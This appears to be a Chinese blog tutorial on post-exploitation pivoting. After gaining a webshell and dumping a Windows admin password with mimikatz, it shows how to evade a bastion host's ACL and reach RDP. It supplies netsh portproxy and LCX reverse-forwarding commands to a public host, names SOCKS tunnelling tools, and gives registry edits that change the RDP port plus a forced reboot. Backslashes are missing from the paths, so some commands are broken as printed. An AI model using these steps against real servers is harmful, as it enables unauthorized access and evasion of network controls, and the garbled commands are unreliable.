如何绕过堡垒机远程登录

假设一个场景：在Webshell中执行mimikatz获取到win管理员密码，并且本地查看端口3389是开放的，可是从当前跳板机无法远程到目标机器。因为某个特定需求，一定要远程登录到这台win服务器，这时该怎么办？

首先我们先分析一下这个场景，端口开放却无法连接，最有可能的情况，就是到达目标网段受到ACL策略限制，只允许通过特定网段登录，比如说堡垒机。大多数堡垒机部署时，为了不改变现有的网络拓扑结构，采用旁路部署的方案，通过ACL策略限制用户访问特定端口。

那么，我们就可以用另一种方式来描述这个问题：目标服务器远程端口受到ACL限制，但其他端口没有限制，那么，最简单的解决方式就可以通过端口转发来绕过。

1、使用netsh命令进行端口转发

Windows自带的netshnetsh实现端口转发，监听12345端口，转发到本地3389端口，可绕过访问策略限制。

#A、3389端口转发到12345端口
netsh interface portproxy add v4tov4 listenaddress=192.168.126.32 listenport=12345 connectaddress=192.168.126.32 connectport=3389

#B、查看配置好的端口映射清单
C:Windowssystem32>netsh interface portproxy show v4tov4

侦听 ipv4:                 连接到 ipv4:

地址            端口        地址            端口
--------------- ----------  --------------- ----------
192.168.126.32  12345       192.168.126.32  3389

这样一来，通过攻击机跳板机直接远程目标机器的12345端口，就可以实现远程登录。

2、LCX 端口转发

在目标机器上执行：lcx.exe -slave 公网ip 51 内网ip 3389
在公网的机器执行：Lcx.exe –listen 51 3340

本地机器上连接 127.0.0.1:3340，即可连接上目标机器的3389。

3、内网穿透工具

SOCKS代理，如Ngrok、frp、EW、reGeorg、sSocks等

通过利用SOCKS协议，结合Proxifier使用，可实现mstsc登录目标主机。

4、修改Windows远程桌面端口

通过修改Windows默认远程桌面端口，从而绕过ACL策略访问限制。

修改注册表，命令如下：

REG ADD "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp" /v "PortNumber" /t REG_DWORD /d 12345/f
REG ADD "HKEY_LOCAL_MACHINESystemCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v "PortNumber" /t REG_DWORD /d 12345 /f

强制重启目标服务器后，注册表生效。

shutdown -r -t 0

此时，就可以远程目标服务器的12345登录。